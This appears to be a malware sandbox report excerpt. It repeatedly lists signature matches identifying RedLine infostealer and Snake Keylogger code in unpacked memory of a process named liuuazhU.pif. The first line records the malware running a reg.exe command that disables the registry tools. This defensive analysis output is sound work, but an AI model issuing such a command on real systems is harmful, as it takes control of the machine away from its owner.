            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: 17.2.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.1.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.1.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.x.exe.21751178.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.43d038.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
